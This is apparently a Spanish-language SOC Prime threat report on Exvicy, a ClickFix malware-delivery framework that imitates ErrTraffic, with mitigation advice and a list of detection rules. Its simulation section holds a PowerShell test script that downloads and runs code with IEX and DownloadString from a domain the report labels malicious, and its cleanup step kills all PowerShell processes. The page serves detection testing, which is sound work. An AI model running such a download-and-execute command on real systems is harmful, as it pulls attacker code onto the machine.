SOC Prime Bias: High

24 Sep 2026 06:51 UTC

Exvicy: Un imitador del marco de distribución de malware ErrTraffic

Author Photo
SOC Prime Team linkedin icon Seguir
Exvicy: Un imitador del marco de distribución de malware ErrTraffic
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumen

Exvicy es un marco de distribución emergente de Malware-as-a-Service (MaaS) ClickFix promocionado en foros de cibercrimen. Utiliza ingeniería social imitando los desafíos de Turnstile de Cloudflare para convencer a los usuarios de ejecutar comandos maliciosos de PowerShell a través del cuadro de diálogo Ejecutar de Windows. El marco copia de cerca a ErrTraffic, reutilizando grandes porciones de su código base JavaScript y técnicas de ofuscación.

Investigación

Analistas de TDR se conectaron a partir de una captura de pantalla de un panel de administración compartida en el foro Exploit.IN para descubrir infraestructura C2 activa. Analizando nombres de servidor específicos de Cloudflare y patrones de registro de dominios, los investigadores identificaron múltiples dominios maliciosos y sitios web de WordPress comprometidos. El análisis técnico confirmó un amplio reutilizamiento del código de ErrTraffic, incluyendo funciones distintivas de JavaScript y lógica anti-análisis.

Mitigación

Las organizaciones deben desplegar un filtrado web robusto para bloquear dominios maliciosos conocidos y TLDs sospechosos asociados con estas campañas. La protección de endpoint debe monitorear y restringir la ejecución anómala de PowerShell, especialmente comandos que involucren irm or iex. Los usuarios también deben ser capacitados para reconocer avisos de ingeniería social que les instruyan a usar atajos de teclado como Win+R para ejecutar comandos.

Respuesta

Si se detecta actividad de Exvicy, los hosts afectados deben ser aislados inmediatamente para detener ejecución adicional de comandos o entrega de cargas útiles. Los respondientes deben revisar los registros operativos de PowerShell para identificar comandos ejecutados y conexiones de red relacionadas. Las direcciones IP y dominios C2 conocidos deben ser bloqueados en el perímetro, seguido de un barrido para otros activos de WordPress comprometidos en el entorno.

Flujo de Ataque

Todavía estamos actualizando esta parte.

Detecciones

Comando y Control Sospechoso por Solicitud de DNS de Dominio de Nivel Superior Inusual (TLD) (via dns)

Equipo SOC Prime
23 Sep 2026

Entrada Suspicious RunMRU Con Semántica de LOLBin (via registry_event)

Equipo SOC Prime
23 Sep 2026

IOCs (IP de Origen) para detectar: Exvicy: Una copia del marco de distribución de malware ErrTraffic

Reglas AI de SOC Prime
23 Sep 2026

IOCs (IP de Destino) para detectar: Exvicy: Una copia del marco de distribución de malware ErrTraffic

Reglas AI de SOC Prime
23 Sep 2026

Detección de Ejecución de Comandos Maliciosos de PowerShell para Malware Exvicy [Windows Powershell]

Reglas AI de SOC Prime
23 Sep 2026

Ejecución de Comandos del Marco Exvicy a través del Atajo Win + R [Creación de Procesos de Windows]

Reglas AI de SOC Prime
23 Sep 2026

Ejecución de Simulación

  • Narrativa del Ataque & Comandos: Un adversario entrega un atajo malicioso o documento a un usuario a través de phishing. Al ejecutarse (T1204.002), el usuario sin saberlo provoca un proceso de PowerShell (T1059.001). El objetivo del atacante es establecer un punto de apoyo descargando una carga útil secundaria. Para imitar el marco Exvicy, la línea de comandos se diseña para incluir el dominio específico conocido como malicioso recaptcha-check.com/8E9curHNH8UfAMLz para descargar el agente malicioso.

  • Script de Prueba de Regresión:

    # Script de simulación para activar la regla de detección de Exvicy.
    # Esto imita los patrones de línea de comandos identificados en la regla Sigma.
    
    $maliciousUrl = "http://recaptcha-check.com/8E9curHNH8UfAMLz"
    $command = "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command `"IEX (New-Object Net.WebClient).DownloadString('$maliciousUrl')`""
    
    Write-Host "[+] Iniciando Simulación: Ejecutando comando para activar la detección..."
    Start-Process powershell.exe -ArgumentList "-ExecutionPolicy Bypass -Command `"$command`""
    Write-Host "[+] Comando de simulación enviado. Verificar SIEM para alertas."
  • Comandos de Limpieza:

    # Limpieza: No se crean archivos permanentes con esta simulación específica,
    # pero aseguramos que no haya procesos de PowerShell persistentes.
    Stop-Process -Name "powershell" -ErrorAction SilentlyContinue
    Write-Host "[+] Limpieza completa."